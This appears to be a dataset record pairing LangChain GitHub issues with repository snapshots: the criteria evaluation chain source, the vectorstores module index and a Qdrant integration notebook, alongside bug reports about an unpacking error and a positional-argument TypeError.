llm=llm, prompt=prompt_template ) result = evaluation_chain.evaluate_string_pairs( input=self.currentQuery, prediction=response1, prediction_b=response2, reference=self.formatSourcesStructure(sourcedocs), ) ``` Sometimes it fails with an error like ``` not enough values to unpack (expected 2, got 1) ``` This happens on roughly one out of every 3-4 requests: one request fails with this error, and the next request then returns a response normally. ### Expected behavior There should be no error, and a valid response should be returned.
https://github.com/langchain-ai/langchain/issues/8272
https://github.com/langchain-ai/langchain/pull/8278
9cbefcc56cbce50e1f6d9392c17e15415d55b7ba
adf019724f095b1835040f4dd8c1ff0026cbc729
"2023-07-26T07:20:57Z"
python
"2023-07-26T08:53:22Z"
libs/langchain/langchain/evaluation/criteria/eval_chain.py
from __future__ import annotations from enum import Enum from typing import Any, Dict, List, Mapping, Optional, Union from pydantic import Extra, Field from langchain.callbacks.manager import Callbacks from langchain.chains.constitutional_ai.models import ConstitutionalPrinciple from langchain.chains.llm import LLMChain from langchain.evaluation.criteria.prompt import PROMPT, PROMPT_WITH_REFERENCES from langchain.evaluation.schema import LLMEvalChain, StringEvaluator from langchain.schema import RUN_KEY, BaseOutputParser, BasePromptTemplate from langchain.schema.language_model import BaseLanguageModel class Criteria(str, Enum): """A Criteria to evaluate.""" CONCISENESS = "conciseness" RELEVANCE = "relevance" CORRECTNESS = "correctness" COHERENCE = "coherence" HARMFULNESS = "harmfulness" MALICIOUSNESS = "maliciousness" HELPFULNESS = "helpfulness" CONTROVERSIALITY = "controversiality" MISOGYNY = "misogyny" CRIMINALITY = "criminality" INSENSITIVITY = "insensitivity" _SUPPORTED_CRITERIA = { Criteria.CONCISENESS: "Is the submission concise and to the point?", Criteria.RELEVANCE: "Is the submission referring to a real quote from the text?", Criteria.CORRECTNESS: "Is the submission correct, accurate, and factual?", Criteria.COHERENCE: "Is the submission coherent, well-structured, and organized?", Criteria.HARMFULNESS: "Is the submission harmful, offensive, or inappropriate?" " If so, response Y. If not, respond N.", Criteria.MALICIOUSNESS: "Is the submission malicious in any way?" " If so, response Y. If not, respond N.", Criteria.HELPFULNESS: "Is the submission helpful, insightful, and appropriate?" " If so, response Y. If not, respond N.", Criteria.CONTROVERSIALITY: "Is the submission controversial or debatable?" " If so, response Y. If not, respond N.", Criteria.MISOGYNY: "Is the submission misogynistic? If so, response Y." " If not, respond N.", Criteria.CRIMINALITY: "Is the submission criminal in any way?" " If so, response Y. If not, respond N.", Criteria.INSENSITIVITY: "Is the submission insensitive to any group of people?" " If so, response Y. If not, respond N.", } class CriteriaResultOutputParser(BaseOutputParser[dict]): """A parser for the output of the CriteriaEvalChain.""" @property def _type(self) -> str: return "criteria_result" def parse(self, text: str) -> Any: """Parse the output text. Args: text (str): The output text to parse. Returns: Any: The parsed output. """ reasoning, verdict = text.strip().rsplit("\n", maxsplit=1) score = 1 if verdict.upper() == "Y" else (0 if verdict.upper() == "N" else None) return { "reasoning": reasoning.strip(), "value": verdict, "score": score, } CRITERIA_TYPE = Union[ Mapping[str, str], Criteria, ConstitutionalPrinciple, ] class CriteriaEvalChain(StringEvaluator, LLMEvalChain, LLMChain): """LLM Chain for evaluating runs against criteria. Parameters ---------- llm : BaseLanguageModel The language model to use for evaluation. criteria : Union[Mapping[str, str]] The criteriaor rubric to evaluate the runs against. It can be a mapping of criterion name to its sdescription, or a single criterion name. prompt : Optional[BasePromptTemplate], default=None The prompt template to use for generating prompts. If not provided, a default prompt template will be used based on the value of `requires_reference`. requires_reference : bool, default=False Whether the evaluation requires a reference text. If `True`, the `PROMPT_WITH_REFERENCES` template will be used, which includes the reference labels in the prompt. 
Otherwise, the `PROMPT` template will be used, which is a reference-free prompt. **kwargs : Any Additional keyword arguments to pass to the `LLMChain` constructor. Returns ------- CriteriaEvalChain An instance of the `CriteriaEvalChain` class. Examples -------- >>> from langchain.chat_models import ChatAnthropic >>> from langchain.evaluation.criteria import CriteriaEvalChain >>> llm = ChatAnthropic(temperature=0) >>> criteria = {"my-custom-criterion": "Is the submission the most amazing ever?"} >>> evaluator = CriteriaEvalChain.from_llm(llm=llm, criteria=criteria) >>> evaluator.evaluate_strings(prediction="Imagine an ice cream flavor for the color aquamarine", input="Tell me an idea") { 'reasoning': 'Here is my step-by-step reasoning for the given criteria:\\n\\nThe criterion is: "Is the submission the most amazing ever?" This is a subjective criterion and open to interpretation. The submission suggests an aquamarine-colored ice cream flavor which is creative but may or may not be considered the most amazing idea ever conceived. There are many possible amazing ideas and this one ice cream flavor suggestion may or may not rise to that level for every person. \\n\\nN', 'value': 'N', 'score': 0, } >>> from langchain.chat_models import ChatOpenAI >>> from langchain.evaluation.criteria import LabeledCriteriaEvalChain >>> llm = ChatOpenAI(model="gpt-4", temperature=0) >>> criteria = "correctness" >>> evaluator = LabeledCriteriaEvalChain.from_llm( ... llm=llm, ... criteria=criteria, ... ) >>> evaluator.evaluate_strings( ... prediction="The answer is 4", ... input="How many apples are there?", ... reference="There are 3 apples", ... ) { 'score': 0, 'reasoning': 'The criterion for this task is the correctness of the submission. The submission states that there are 4 apples, but the reference indicates that there are actually 3 apples. Therefore, the submission is not correct, accurate, or factual according to the given criterion.\\n\\nN', 'value': 'N', } """ # noqa: E501 output_parser: BaseOutputParser = Field(default_factory=CriteriaResultOutputParser) """The parser to use to map the output to a structured result.""" criterion_name: str """The name of the criterion being evaluated.""" output_key: str = "results" #: :meta private: class Config: """Configuration for the QAEvalChain.""" extra = Extra.ignore @property def requires_reference(self) -> bool: """Whether the evaluation requires a reference text.""" return False @property def requires_input(self) -> bool: return True @property def evaluation_name(self) -> str: """Get the name of the evaluation. Returns ------- str The name of the evaluation. """ return self.criterion_name @property def _skip_reference_warning(self) -> str: """Warning to show when reference is ignored.""" return ( f"Ignoring reference in {self.__class__.__name__}, as it is not expected." "\nTo use references, use the labeled_criteria instead." ) @classmethod def resolve_criteria( cls, criteria: Optional[Union[CRITERIA_TYPE, str]], ) -> Dict[str, str]: """Resolve the criteria to evaluate. Parameters ---------- criteria : CRITERIA_TYPE The criteria to evaluate the runs against. It can be: - a mapping of a criterion name to its description - a single criterion name present in one of the default criteria - a single `ConstitutionalPrinciple` instance Returns ------- Dict[str, str] A dictionary mapping criterion names to descriptions. 
        Examples
        --------
        >>> criterion = "relevance"
        >>> CriteriaEvalChain.resolve_criteria(criterion)
        {'relevance': 'Is the submission referring to a real quote from the text?'}
        """  # noqa: E501
        if criteria is None:
            return {
                "helpfulness": _SUPPORTED_CRITERIA[Criteria.HELPFULNESS],
            }
        if isinstance(criteria, Criteria):
            criteria_ = {criteria.value: _SUPPORTED_CRITERIA[criteria]}
        elif isinstance(criteria, str):
            criteria_ = {criteria: _SUPPORTED_CRITERIA[Criteria(criteria)]}
        elif isinstance(criteria, ConstitutionalPrinciple):
            criteria_ = {criteria.name: criteria.critique_request}
        else:
            if not criteria:
                raise ValueError(
                    "Criteria cannot be empty. "
                    "Please provide a criterion name or a mapping of the criterion name"
                    " to its description."
                )
            criteria_ = dict(criteria)
        return criteria_

    @classmethod
    def _resolve_prompt(
        cls, prompt: Optional[BasePromptTemplate] = None
    ) -> BasePromptTemplate:
        expected_input_vars = {"input", "output", "criteria"}
        prompt_ = prompt or PROMPT
        if expected_input_vars != set(prompt_.input_variables):
            raise ValueError(
                f"Input variables should be {expected_input_vars}, "
                f"but got {prompt_.input_variables}"
            )
        return prompt_

    @classmethod
    def from_llm(
        cls,
        llm: BaseLanguageModel,
        criteria: Optional[CRITERIA_TYPE] = None,
        *,
        prompt: Optional[BasePromptTemplate] = None,
        **kwargs: Any,
    ) -> CriteriaEvalChain:
        """Create a `CriteriaEvalChain` instance from an llm and criteria.

        Parameters
        ----------
        llm : BaseLanguageModel
            The language model to use for evaluation.
        criteria : CRITERIA_TYPE - default=None for "helpfulness"
            The criteria to evaluate the runs against. It can be:
                - a mapping of a criterion name to its description
                - a single criterion name present in one of the default criteria
                - a single `ConstitutionalPrinciple` instance
        prompt : Optional[BasePromptTemplate], default=None
            The prompt template to use for generating prompts. If not provided,
            a default prompt template will be used.
        **kwargs : Any
            Additional keyword arguments to pass to the `LLMChain`
            constructor.

        Returns
        -------
        CriteriaEvalChain
            An instance of the `CriteriaEvalChain` class.

        Examples
        --------
        >>> from langchain.llms import OpenAI
        >>> from langchain.evaluation.criteria import CriteriaEvalChain
        >>> llm = OpenAI()
        >>> chain = CriteriaEvalChain.from_llm(llm=llm, criteria="conciseness")
        """
        prompt_ = cls._resolve_prompt(prompt)
        if criteria == Criteria.CORRECTNESS:
            raise ValueError(
                "Correctness should not be used in the reference-free"
                " 'criteria' evaluator (CriteriaEvalChain)."
                " Please use the 'labeled_criteria' evaluator"
                " (LabeledCriteriaEvalChain) instead."
            )
        criteria_ = cls.resolve_criteria(criteria)
        criteria_str = " ".join(f"{k}: {v}" for k, v in criteria_.items())
        prompt_ = prompt_.partial(criteria=criteria_str)
        return cls(
            llm=llm,
            prompt=prompt_,
            criterion_name="-".join(criteria_),
            **kwargs,
        )

    def _get_eval_input(
        self,
        prediction: str,
        reference: Optional[str],
        input: Optional[str],
    ) -> dict:
        """Get the evaluation input."""
        input_ = {
            "input": input,
            "output": prediction,
        }
        if self.requires_reference:
            input_["reference"] = reference
        return input_

    def _prepare_output(self, result: dict) -> dict:
        """Prepare the output."""
        parsed = result[self.output_key]
        if RUN_KEY in result:
            parsed[RUN_KEY] = result[RUN_KEY]
        return parsed

    def _evaluate_strings(
        self,
        *,
        prediction: str,
        reference: Optional[str] = None,
        input: Optional[str] = None,
        callbacks: Callbacks = None,
        tags: Optional[List[str]] = None,
        metadata: Optional[Dict[str, Any]] = None,
        include_run_info: bool = False,
        **kwargs: Any,
    ) -> dict:
        """Evaluate a prediction against the criteria.

        Parameters
        ----------
        prediction : str
            The predicted text to evaluate.
        reference : Optional[str], default=None
            The reference text to compare against. This is required if
            `requires_reference` is `True`.
        input : Optional[str], default=None
            The input text used to generate the prediction.
        **kwargs : Any
            Additional keyword arguments to pass to the `LLMChain` `__call__`
            method.

        Returns
        -------
        dict
            The evaluation results.

        Examples
        --------
        >>> from langchain.llms import OpenAI
        >>> from langchain.evaluation.criteria import CriteriaEvalChain
        >>> llm = OpenAI()
        >>> criteria = "conciseness"
        >>> chain = CriteriaEvalChain.from_llm(llm=llm, criteria=criteria)
        >>> chain.evaluate_strings(
                prediction="The answer is 42.",
                reference="42",
                input="What is the answer to life, the universe, and everything?",
            )
        """
        input_ = self._get_eval_input(prediction, reference, input)
        result = self(
            input_,
            callbacks=callbacks,
            tags=tags,
            metadata=metadata,
            include_run_info=include_run_info,
        )
        return self._prepare_output(result)

    async def _aevaluate_strings(
        self,
        *,
        prediction: str,
        reference: Optional[str] = None,
        input: Optional[str] = None,
        callbacks: Callbacks = None,
        tags: Optional[List[str]] = None,
        metadata: Optional[Dict[str, Any]] = None,
        include_run_info: bool = False,
        **kwargs: Any,
    ) -> dict:
        """Asynchronously evaluate a prediction against the criteria.

        Parameters
        ----------
        prediction : str
            The predicted text to evaluate.
        reference : Optional[str], default=None
            The reference text to compare against. This is required if
            `requires_reference` is `True`.
        input : Optional[str], default=None
            The input text used to generate the prediction.
        **kwargs : Any
            Additional keyword arguments to pass to the `LLMChain` `acall`
            method.

        Returns
        -------
        dict
            The evaluation results.

        Examples
        --------
        >>> from langchain.llms import OpenAI
        >>> from langchain.evaluation.criteria import CriteriaEvalChain
        >>> llm = OpenAI()
        >>> criteria = "conciseness"
        >>> chain = CriteriaEvalChain.from_llm(llm=llm, criteria=criteria)
        >>> await chain.aevaluate_strings(
                prediction="The answer is 42.",
                reference="42",
                input="What is the answer to life, the universe, and everything?",
            )
        """
        input_ = self._get_eval_input(prediction, reference, input)
        result = await self.acall(
            input_,
            callbacks=callbacks,
            tags=tags,
            metadata=metadata,
            include_run_info=include_run_info,
        )
        return self._prepare_output(result)


class LabeledCriteriaEvalChain(CriteriaEvalChain):
    """Criteria evaluation chain that requires references."""

    @property
    def requires_reference(self) -> bool:
        """Whether the evaluation requires a reference text."""
        return True

    @classmethod
    def _resolve_prompt(
        cls, prompt: Optional[BasePromptTemplate] = None
    ) -> BasePromptTemplate:
        expected_input_vars = {"input", "output", "criteria", "reference"}
        prompt_ = prompt or PROMPT_WITH_REFERENCES
        if expected_input_vars != set(prompt_.input_variables):
            raise ValueError(
                f"Input variables should be {expected_input_vars}, "
                f"but got {prompt_.input_variables}"
            )
        return prompt_

    @classmethod
    def from_llm(
        cls,
        llm: BaseLanguageModel,
        criteria: Optional[CRITERIA_TYPE] = None,
        *,
        prompt: Optional[BasePromptTemplate] = None,
        **kwargs: Any,
    ) -> CriteriaEvalChain:
        """Create a `LabeledCriteriaEvalChain` instance from an llm and criteria.

        Parameters
        ----------
        llm : BaseLanguageModel
            The language model to use for evaluation.
        criteria : CRITERIA_TYPE - default=None for "helpfulness"
            The criteria to evaluate the runs against. It can be:
                - a mapping of a criterion name to its description
                - a single criterion name present in one of the default criteria
                - a single `ConstitutionalPrinciple` instance
        prompt : Optional[BasePromptTemplate], default=None
            The prompt template to use for generating prompts. If not provided,
            a default prompt will be used.
        **kwargs : Any
            Additional keyword arguments to pass to the `LLMChain`
            constructor.

        Returns
        -------
        LabeledCriteriaEvalChain
            An instance of the `LabeledCriteriaEvalChain` class.

        Examples
        --------
        >>> from langchain.llms import OpenAI
        >>> from langchain.evaluation.criteria import LabeledCriteriaEvalChain
        >>> llm = OpenAI()
        >>> criteria = {
                "hallucination": (
                    "Does this submission contain information"
                    " not present in the input or reference?"
                ),
            }
        >>> chain = LabeledCriteriaEvalChain.from_llm(
                llm=llm,
                criteria=criteria,
            )
        """
        prompt_ = cls._resolve_prompt(prompt)
        criteria_ = cls.resolve_criteria(criteria)
        criteria_str = " ".join(f"{k}: {v}" for k, v in criteria_.items())
        prompt_ = prompt_.partial(criteria=criteria_str)
        return cls(
            llm=llm,
            prompt=prompt_,
            criterion_name="-".join(criteria_),
            **kwargs,
        )
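A quick usage sketch of the two evaluators defined above (not part of the snapshot; the model choice and example strings are illustrative, and the exact keys in the result dict depend on the chain's output parser):

```python
from langchain.chat_models import ChatOpenAI
from langchain.evaluation.criteria import CriteriaEvalChain, LabeledCriteriaEvalChain

llm = ChatOpenAI(temperature=0)  # any BaseLanguageModel works

# Reference-free evaluation against a single built-in criterion.
chain = CriteriaEvalChain.from_llm(llm=llm, criteria="conciseness")
result = chain.evaluate_strings(
    prediction="The answer is 42.",
    input="What is the answer to life, the universe, and everything?",
)
print(result)  # e.g. {"reasoning": "...", "value": "Y", "score": 1}

# Reference-required evaluation; "correctness" is only allowed here.
labeled = LabeledCriteriaEvalChain.from_llm(llm=llm, criteria="correctness")
result = labeled.evaluate_strings(
    prediction="The answer is 42.",
    reference="42",
    input="What is the answer to life, the universe, and everything?",
)
```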
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
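Not part of the original report: a rough sketch of how such an integration is typically consumed once merged, assuming it follows LangChain's standard `VectorStore` interface. The `Meilisearch` class name and its `client`/`index_name` parameters are assumptions until the PR lands:

```python
import meilisearch
from langchain.embeddings.openai import OpenAIEmbeddings
from langchain.vectorstores import Meilisearch  # hypothetical import until the PR is merged

# Connect to a running Meilisearch instance (URL and key are placeholders).
client = meilisearch.Client("http://127.0.0.1:7700", "masterKey")
vector_store = Meilisearch.from_texts(
    texts=["Meilisearch is an open-source search engine."],
    embedding=OpenAIEmbeddings(),
    client=client,      # assumed parameter name
    index_name="demo",  # assumed parameter name
)
docs = vector_store.similarity_search("open-source search", k=1)
```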
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
docs/extras/integrations/vectorstores/meilisearch.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
libs/langchain/langchain/vectorstores/__init__.py
"""Wrappers on top of vector stores.""" from langchain.vectorstores.alibabacloud_opensearch import ( AlibabaCloudOpenSearch, AlibabaCloudOpenSearchSettings, ) from langchain.vectorstores.analyticdb import AnalyticDB from langchain.vectorstores.annoy import Annoy from langchain.vectorstores.atlas import AtlasDB from langchain.vectorstores.awadb import AwaDB from langchain.vectorstores.azuresearch import AzureSearch from langchain.vectorstores.base import VectorStore from langchain.vectorstores.cassandra import Cassandra from langchain.vectorstores.chroma import Chroma from langchain.vectorstores.clarifai import Clarifai from langchain.vectorstores.clickhouse import Clickhouse, ClickhouseSettings from langchain.vectorstores.deeplake import DeepLake from langchain.vectorstores.docarray import DocArrayHnswSearch, DocArrayInMemorySearch from langchain.vectorstores.elastic_vector_search import ( ElasticKnnSearch, ElasticVectorSearch, ) from langchain.vectorstores.faiss import FAISS from langchain.vectorstores.hologres import Hologres from langchain.vectorstores.lancedb import LanceDB from langchain.vectorstores.marqo import Marqo from langchain.vectorstores.matching_engine import MatchingEngine from langchain.vectorstores.milvus import Milvus from langchain.vectorstores.mongodb_atlas import MongoDBAtlasVectorSearch from langchain.vectorstores.myscale import MyScale, MyScaleSettings from langchain.vectorstores.opensearch_vector_search import OpenSearchVectorSearch from langchain.vectorstores.pgembedding import PGEmbedding from langchain.vectorstores.pgvector import PGVector from langchain.vectorstores.pinecone import Pinecone from langchain.vectorstores.qdrant import Qdrant from langchain.vectorstores.redis import Redis from langchain.vectorstores.rocksetdb import Rockset from langchain.vectorstores.singlestoredb import SingleStoreDB from langchain.vectorstores.sklearn import SKLearnVectorStore from langchain.vectorstores.starrocks import StarRocks from langchain.vectorstores.supabase import SupabaseVectorStore from langchain.vectorstores.tair import Tair from langchain.vectorstores.tigris import Tigris from langchain.vectorstores.typesense import Typesense from langchain.vectorstores.vectara import Vectara from langchain.vectorstores.weaviate import Weaviate from langchain.vectorstores.zilliz import Zilliz __all__ = [ "AlibabaCloudOpenSearch", "AlibabaCloudOpenSearchSettings", "AnalyticDB", "Annoy", "AtlasDB", "AwaDB", "AzureSearch", "Cassandra", "Chroma", "Clickhouse", "ClickhouseSettings", "DeepLake", "DocArrayHnswSearch", "DocArrayInMemorySearch", "ElasticVectorSearch", "ElasticKnnSearch", "FAISS", "PGEmbedding", "Hologres", "LanceDB", "MatchingEngine", "Marqo", "Milvus", "Zilliz", "SingleStoreDB", "Chroma", "Clarifai", "OpenSearchVectorSearch", "AtlasDB", "DeepLake", "Annoy", "MongoDBAtlasVectorSearch", "MyScale", "MyScaleSettings", "OpenSearchVectorSearch", "Pinecone", "Qdrant", "Redis", "Rockset", "SKLearnVectorStore", "SingleStoreDB", "StarRocks", "SupabaseVectorStore", "Tair", "Tigris", "Typesense", "Vectara", "VectorStore", "Weaviate", "Zilliz", "PGVector", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
libs/langchain/langchain/vectorstores/meilisearch.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
libs/langchain/tests/integration_tests/vectorstores/docker-compose/meilisearch.yaml
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
7,603
Add support for Meilisearch vector databases
### Feature request Add support for Meilisearch vector search. [Meilisearch](https://www.meilisearch.com) is an open-source search engine. See [documentation](https://www.meilisearch.com/docs) ### Motivation Meilisearch is releasing the vector search/store feature, which should be available from July 31st. ### Your contribution I'm working on it and will submit a PR for this issue soon.
https://github.com/langchain-ai/langchain/issues/7603
https://github.com/langchain-ai/langchain/pull/7649
b7d6e1909cf5346a4384280fba3d732597778bae
8ee56b9a5b3751db122bd896daeb1e0b7766def3
"2023-07-12T15:32:23Z"
python
"2023-07-29T00:06:54Z"
libs/langchain/tests/integration_tests/vectorstores/test_meilisearch.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,457
VectorStore.from_documents() takes 3 positional arguments but 4 were given
### System Info ... % python --version Python 3.11.4 ... % pip show langchain | grep Version Version: 0.0.247 ### Who can help? @eyurtsev ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction When following the langchain docs [here](https://python.langchain.com/docs/integrations/vectorstores/qdrant#qdrant-cloud), the following error is thrown: ```py qdrant = Qdrant.from_documents( docs, embeddings, url, prefer_grpc=True, api_key=api_key, collection_name="test", ) ``` error: ``` Traceback (most recent call last): File "...myscript.py", line 29, in <module> qdrant = Qdrant.from_documents( ^^^^^^^^^^^^^^^^^^^^^^ TypeError: VectorStore.from_documents() takes 3 positional arguments but 4 were given ``` Is it related to https://github.com/langchain-ai/langchain/pull/7910? ### Expected behavior Qdrant is initialized properly.
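A note on the cause and a likely workaround (not from the original report): `VectorStore.from_documents` is declared as `from_documents(cls, documents, embedding, **kwargs)`, so passing `url` positionally makes it a fourth positional argument. Passing the connection details as keywords routes them through `**kwargs` instead:

```py
qdrant = Qdrant.from_documents(
    docs,
    embeddings,
    url=url,  # keyword instead of positional
    prefer_grpc=True,
    api_key=api_key,
    collection_name="test",
)
```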
https://github.com/langchain-ai/langchain/issues/8457
https://github.com/langchain-ai/langchain/pull/8482
4923cf029a36504a00368abe6b9c8b77e46aa740
08f5e6b8012f5eda2609103f33676199a3781a15
"2023-07-29T10:53:33Z"
python
"2023-07-30T20:24:44Z"
docs/extras/integrations/vectorstores/qdrant.ipynb
{ "cells": [ { "attachments": {}, "cell_type": "markdown", "id": "683953b3", "metadata": {}, "source": [ "# Qdrant\n", "\n", ">[Qdrant](https://qdrant.tech/documentation/) (read: quadrant ) is a vector similarity search engine. It provides a production-ready service with a convenient API to store, search, and manage points - vectors with an additional payload. `Qdrant` is tailored to extended filtering support. It makes it useful for all sorts of neural network or semantic-based matching, faceted search, and other applications.\n", "\n", "\n", "This notebook shows how to use functionality related to the `Qdrant` vector database. \n", "\n", "There are various modes of how to run `Qdrant`, and depending on the chosen one, there will be some subtle differences. The options include:\n", "- Local mode, no server required\n", "- On-premise server deployment\n", "- Qdrant Cloud\n", "\n", "See the [installation instructions](https://qdrant.tech/documentation/install/)." ] }, { "cell_type": "code", "execution_count": null, "id": "e03e8460-8f32-4d1f-bb93-4f7636a476fa", "metadata": { "tags": [] }, "outputs": [], "source": [ "!pip install qdrant-client" ] }, { "attachments": {}, "cell_type": "markdown", "id": "7b2f111b-357a-4f42-9730-ef0603bdc1b5", "metadata": {}, "source": [ "We want to use `OpenAIEmbeddings` so we have to get the OpenAI API Key." ] }, { "cell_type": "code", "execution_count": 2, "id": "082e7e8b-ac52-430c-98d6-8f0924457642", "metadata": { "tags": [] }, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "OpenAI API Key: \u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\u00b7\n" ] } ], "source": [ "import os\n", "import getpass\n", "\n", "os.environ[\"OPENAI_API_KEY\"] = getpass.getpass(\"OpenAI API Key:\")" ] }, { "cell_type": "code", "execution_count": 3, "id": "aac9563e", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:22.282884Z", "start_time": "2023-04-04T10:51:21.408077Z" }, "tags": [] }, "outputs": [], "source": [ "from langchain.embeddings.openai import OpenAIEmbeddings\n", "from langchain.text_splitter import CharacterTextSplitter\n", "from langchain.vectorstores import Qdrant\n", "from langchain.document_loaders import TextLoader" ] }, { "cell_type": "code", "execution_count": 4, "id": "a3c3999a", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:22.520144Z", "start_time": "2023-04-04T10:51:22.285826Z" }, "tags": [] }, "outputs": [], "source": [ "loader = TextLoader(\"../../../state_of_the_union.txt\")\n", "documents = loader.load()\n", "text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)\n", "docs = text_splitter.split_documents(documents)\n", "\n", "embeddings = OpenAIEmbeddings()" ] }, { "attachments": {}, "cell_type": "markdown", "id": "eeead681", "metadata": {}, "source": [ "## Connecting to Qdrant from LangChain\n", "\n", "### Local mode\n", "\n", "Python client allows you to run the same code in local mode without running the Qdrant server. That's great for testing things out and debugging or if you plan to store just a small amount of vectors. The embeddings might be fully kepy in memory or persisted on disk.\n", "\n", "#### In-memory\n", "\n", "For some testing scenarios and quick experiments, you may prefer to keep all the data in memory only, so it gets lost when the client is destroyed - usually at the end of your script/notebook." 
] }, { "cell_type": "code", "execution_count": 5, "id": "8429667e", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:22.525091Z", "start_time": "2023-04-04T10:51:22.522015Z" }, "tags": [] }, "outputs": [], "source": [ "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " location=\":memory:\", # Local mode with in-memory storage only\n", " collection_name=\"my_documents\",\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "59f0b954", "metadata": {}, "source": [ "#### On-disk storage\n", "\n", "Local mode, without using the Qdrant server, may also store your vectors on disk so they're persisted between runs." ] }, { "cell_type": "code", "execution_count": 6, "id": "24b370e2", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:24.827567Z", "start_time": "2023-04-04T10:51:22.529080Z" }, "tags": [] }, "outputs": [], "source": [ "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " path=\"/tmp/local_qdrant\",\n", " collection_name=\"my_documents\",\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "749658ce", "metadata": {}, "source": [ "### On-premise server deployment\n", "\n", "No matter if you choose to launch Qdrant locally with [a Docker container](https://qdrant.tech/documentation/install/), or select a Kubernetes deployment with [the official Helm chart](https://github.com/qdrant/qdrant-helm), the way you're going to connect to such an instance will be identical. You'll need to provide a URL pointing to the service." ] }, { "cell_type": "code", "execution_count": 5, "id": "91e7f5ce", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:24.832708Z", "start_time": "2023-04-04T10:51:24.829905Z" } }, "outputs": [], "source": [ "url = \"<---qdrant url here --->\"\n", "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " url,\n", " prefer_grpc=True,\n", " collection_name=\"my_documents\",\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "c9e21ce9", "metadata": {}, "source": [ "### Qdrant Cloud\n", "\n", "If you prefer not to keep yourself busy with managing the infrastructure, you can choose to set up a fully-managed Qdrant cluster on [Qdrant Cloud](https://cloud.qdrant.io/). There is a free forever 1GB cluster included for trying out. The main difference with using a managed version of Qdrant is that you'll need to provide an API key to secure your deployment from being accessed publicly." ] }, { "cell_type": "code", "execution_count": 6, "id": "dcf88bdf", "metadata": { "ExecuteTime": { "end_time": "2023-04-04T10:51:24.837599Z", "start_time": "2023-04-04T10:51:24.834690Z" } }, "outputs": [], "source": [ "url = \"<---qdrant cloud cluster url here --->\"\n", "api_key = \"<---api key here--->\"\n", "qdrant = Qdrant.from_documents(\n", " docs,\n", " embeddings,\n", " url,\n", " prefer_grpc=True,\n", " api_key=api_key,\n", " collection_name=\"my_documents\",\n", ")" ] }, { "attachments": {}, "cell_type": "markdown", "id": "93540013", "metadata": {}, "source": [ "## Recreating the collection\n", "\n", "Both `Qdrant.from_texts` and `Qdrant.from_documents` methods are great to start using Qdrant with Langchain. In the previous versions the collection was recreated every time you called any of them. That behaviour has changed. Currently, the collection is going to be reused if it already exists. Setting `force_recreate` to `True` allows to remove the old collection and start from scratch." 
